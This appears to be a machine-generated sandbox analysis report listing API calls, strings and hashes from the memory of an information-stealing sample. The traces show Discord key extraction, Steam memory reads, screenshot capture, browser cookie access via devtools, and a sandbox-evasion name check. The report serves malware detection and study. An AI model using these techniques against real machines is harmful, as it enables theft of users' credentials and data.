                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                                                      • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                                                      • Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: GetProcessHeap.KERNEL32 ref: 0040D0FB
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: HeapAlloc.KERNEL32(00000000,00000008,-00000001), ref: 0040D105
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040D080: strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040D2BA
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 0040D2C4
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D2E2
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D318
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D332
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D33C
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D35A
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D385
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D39F
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D3A9
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D3C3
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D3E4
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D40F
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D429
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D433
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$Free$Alloc$strcpy_s$??3@lstrlenstrchr$strlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2961803143-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                                      • Instruction ID: ca06d6565e22a4b8139dc5fe8ec41e059b536d5ea08dc7ed3398fadcca26eeb0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7F1D5B19043005BD710ABA5CD49B6FBBE9EF85714F04083EF986972D1D778AC48CB9A
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00412EC4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                                                      • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                                      • API String ID: 348468850-2422389115
                                                                                                                                                                                                                                                                                      • Opcode ID: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                                      • Instruction ID: af6f1e03352f6f9f1d8fae1c75086c49a28638e44c42a35a98b4b473fe3f47e4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1E1AF70204308AFD324AF25D895FABB3A9BB44344F04445EFD179B292DB7CE985CB69
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,?,?,00000000,?,?,00000000,?,?,00000000,00000000), ref: 00413081
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%DESKTOP%,00000000,?,00000010,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004130AE
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%APPDATA%,00000000,?,0000001A,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004130DA
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%LOCALAPPDATA%,00000000,?,0000001C,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00413106
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%USERPROFILE%,00000000,?,00000028,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00413132
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%DOCUMENTS%,00000000,?,00000005,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0041315E
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%PROGRAMFILES%,00000000,?,00000026,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0041318A
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%PROGRAMFILES_86%,00000000,?,0000002A,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004131B6
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,%RECENT%,00000000,?,00000008,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004131E2
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,true,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00413268
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,false,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041327D
                                                                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0041301C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$strtok_s$FolderPathlstrlen
                                                                                                                                                                                                                                                                                      • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                                      • API String ID: 1330363096-2422389115
                                                                                                                                                                                                                                                                                      • Opcode ID: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                                      • Instruction ID: f18559b84add82ea06590c7feb2660792e730a2b0798f24fd2155c98f040b140
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91C1AF70604308AFD214AF25DC95FABB3A9BB44348F00445EFD179B292DB7CA985CB69
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??2@??3@memcpy
                                                                                                                                                                                                                                                                                      • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                      • API String ID: 1695611338-4155744131
                                                                                                                                                                                                                                                                                      • Opcode ID: 92a53e744f128c6ceb915dfb9a4350ffea1a16a917ecd8b5c380676206da17a1
                                                                                                                                                                                                                                                                                      • Instruction ID: b745cebb343ebaf7917439795664f4dc5ec349037e75ec0584470be98ece6274
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92a53e744f128c6ceb915dfb9a4350ffea1a16a917ecd8b5c380676206da17a1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08D105B1A002145BDB24DF64DD84AAFB775EF41308F11052EF903A72C2DB7CAD958B99
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FE01
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040F9B0: strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040F9B0: ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040F9B0: memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040F9B0: VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FF1E
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040FF84
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000012E,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 0040FFC4
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 00410037
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410044
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                                      • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??3@memset$Processstrlen$MemoryOpenQueryReadVirtual_invalid_parameter_noinfo_noreturnmemcpystrcpy
                                                                                                                                                                                                                                                                                      • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73$@Gc$N0ZWFt$steam.exe
                                                                                                                                                                                                                                                                                      • API String ID: 2915318159-3068576885
                                                                                                                                                                                                                                                                                      • Opcode ID: fce7fecf461071167e0cc146cfa51517afb3279c5333241af36d07da9d6a637a
                                                                                                                                                                                                                                                                                      • Instruction ID: 0ac8410772c06d3c7cd158b0f29ba11351ce6fbe5d6182cbcead23e9eae0fd7c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fce7fecf461071167e0cc146cfa51517afb3279c5333241af36d07da9d6a637a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AA125B16043015BDB20AA24DD84BAFBAD5AF41304F10093FF946976C2E7BD99C8839E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041179A
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 004117A8
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004117B5
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004117E2
                                                                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00411847
                                                                                                                                                                                                                                                                                      • StrCmpCW.SHLWAPI(?,image/jpeg), ref: 00411878
                                                                                                                                                                                                                                                                                      • GetHGlobalFromStream.COMBASE(?,00000000), ref: 004118E2
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004118EB
                                                                                                                                                                                                                                                                                      • GlobalSize.KERNEL32(00000000), ref: 004118FF
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00411964
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00417FAE), ref: 0041197F
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00411986
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00411993
                                                                                                                                                                                                                                                                                      • CloseWindow.USER32(?), ref: 0041199A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: GlobalObject$Window$DeleteSelectStream$CloseCreateDesktopFromLockRectReleaseSizemalloc
                                                                                                                                                                                                                                                                                      • String ID: image/jpeg$screenshot.jpg
                                                                                                                                                                                                                                                                                      • API String ID: 290954413-3715547155
                                                                                                                                                                                                                                                                                      • Opcode ID: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                                      • Instruction ID: ee18476c3b49a6e7ea655472561b7fd097213a4b83d20557ae7d52cec962e0ac
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6713D71900619EFDF04AFA0DD89AEEBB79FF08304F005019FA16A7161DB759985CBE4
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                                                      • String ID: block$|
                                                                                                                                                                                                                                                                                      • API String ID: 3407564107-542838162
                                                                                                                                                                                                                                                                                      • Opcode ID: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                                      • Instruction ID: ce61686c9be415db56d3220093c378b95acedfbe19f9b6f22c8a3ac929646854
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03516FB0308708AFD7209F26D849B9BB7A9FB1174AF10440BEC1397290DB7DD6C58A5D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00010000,?,0041DE17,?), ref: 0041D0C8
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00420BC0), ref: 0041D0FD
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.zip), ref: 0041D10F
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.zoo), ref: 0041D11F
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.arc), ref: 0041D12F
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.lzh), ref: 0041D13F
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.arj), ref: 0041D14F
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.gz), ref: 0041D15F
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,.tgz), ref: 0041D16F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                                                                                                                                      • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                                                                                                                      • API String ID: 1659193697-51310709
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004010A8
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004010BA
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420C52), ref: 004010CE
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420F55), ref: 004010D6
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420C48), ref: 004010DE
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420FB1), ref: 004010E6
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420C18), ref: 004010EE
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420C52), ref: 004010F6
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420C50), ref: 004010FE
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042035D,?,00420C50), ref: 00401106
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042060F,?,0042035D,?,00420C50), ref: 0040110E
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401116
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040111E
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401126
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040112E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 00401137
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 0040114A
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00401162
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcat$Heap$Process$AllocNamememsetstrcmp$ComputerExitUser
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2002865342-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004153BA
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004153D0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,0000001A), ref: 00415403
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,\discord\), ref: 00415415
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415423
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,Local State), ref: 0041542F
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 004078F0: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,00000000,?,?,?,00000000), ref: 0040794C
                                                                                                                                                                                                                                                                                        • Part of subcall function 004078F0: lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                                        • Part of subcall function 004078F0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00407999
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
